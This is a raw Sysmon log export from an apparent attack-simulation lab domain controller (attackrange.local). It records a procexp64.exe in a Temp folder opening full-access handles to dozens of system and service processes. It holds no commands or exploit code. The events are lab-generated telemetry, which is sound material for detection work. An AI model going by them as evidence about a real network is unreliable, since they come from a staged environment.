15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788528Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788527Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788526Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788525Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788524Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788523Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788522Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788521Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788520Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788519Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788518Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788517Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788516Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788515Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788514Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788513Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788512Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788511Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788510Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788509Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788508Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788507Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788506Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788505Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788504Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788503Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788502Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788501Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788500Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788499Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788498Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788497Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788496Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788495Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788494Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788493Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:21.970{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000788492Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 